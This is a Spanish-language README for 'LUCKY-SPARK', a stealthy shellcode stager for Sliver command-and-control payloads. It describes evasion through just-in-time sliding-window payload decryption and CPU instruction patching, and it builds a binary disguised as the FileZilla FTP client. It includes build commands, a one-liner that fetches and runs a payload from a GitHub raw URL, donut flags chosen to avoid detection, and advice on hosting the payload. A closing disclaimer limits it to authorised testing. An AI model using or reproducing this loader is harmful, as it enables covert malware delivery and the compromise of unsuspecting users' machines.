
Un stager sigiloso diseñado para cargas útiles de shellcode preparadas con http/https como Sliver, o en raw de GitHub.
⟪ LUCKY-SPARK ⟫ es un stager diseñado para cargas útiles de shellcode almacenadas con http/https como Sliver o en GitHub raw. Utiliza métodos modernos de ofuscación y evasión como el descifrado justo a tiempo de ventana deslizante del payload y el parcheo de instrucciones de CPU. Por defecto, crea un ejecutable que se hace pasar por el cliente FTP FileZilla.
Clona o descarga el repositorio y asegúrate de tener make y instalados en tu sistema.
mingwgit clone <repository_url>
cd LUCKY-SPARK
Ejecuta el script de creación del binario.
./luckySpark.sh
se te pedirá que ingreses la URL de tu payload staged y un User-Agent opcional.

Se puede ejecutar en una línea para poder ser implementado en scripts:
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

Si usas donut o Sliver (que usa donut) recomiendo estos flags para crear el payload:
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
Esto evita comportamientos sospechosos y marcados por donut. Especialmente la evasión de donut está muy marcada irónicamente.
Esto crea un binario filezilla.exe que al ejecutarse recupera y ejecuta el payload.
Este stager fue diseñado para ser usado con Sliver. Realiza el staging de un payload de Sliver como se describe aquí Sliver Staging No cifres el payload.
Pero cualquier método de staging basado en http/https funcionará.
como python3 -m http.server
o un payload subido a github.com en un repositorio público.
Este stager NO soporta el protocolo de staging de meterpreter.
Step 1: RIP hits Page 0 and Page 0 gets decrypted
Pages: [ D | E | E | ... ]
RIP -> ^
Step 2: RIP hits Page 1 and Page 1 gets decrypted
Pages: [ D | D | E | ... ]
RIP -> ^
Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
Pages: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK está destinado únicamente para fines educativos, de investigación y pruebas de penetración autorizadas. El uso no autorizado contra sistemas sin permiso es ilegal y poco ético.